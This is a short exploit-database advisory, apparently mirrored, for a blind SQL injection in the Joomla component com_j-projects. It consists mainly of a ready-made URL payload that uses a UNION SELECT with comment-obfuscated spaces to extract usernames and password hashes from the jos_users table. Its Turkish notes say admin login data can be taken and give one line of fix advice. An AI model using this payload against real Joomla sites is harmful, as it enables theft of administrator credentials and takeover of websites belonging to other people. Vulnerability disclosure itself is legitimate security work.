Joomla! Component com_j-projects – Blind SQL Injection

  • 作者: Pyske
    日期: 2010-01-04
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/10988/
  • <------------------- header data start ------------------- >
    
    #############################################################
    # Joomla Component com_j-projects Blind SQL Injection Vulnerability
    #############################################################
    
    # Author : Pyske
    
    
    # Name : com_j-projects
    
    
    # Bug Type : Blind SQL Injection
    
    
    # Infection : Admin login bilgileri al?nabilir.
    
    
    
    
    # Bug Fix Advice : Zararli karakterler filtrelenmelidir.
    
    #############################################################
    
    < ------------------- header data end of ------------------- >
    
    < -- bug code start -- >
    
    path /index.php?option=com_j-projects&Itemid=102&cat=5&task=projects&project=30/**/and/**/1=0/**/union/**/select/**/0,1,concat(username,0x3a,password),3,4,5,6,7,8,9,10,11,12,13/**/from/**/jos_users
    
    < -- bug code end of -- >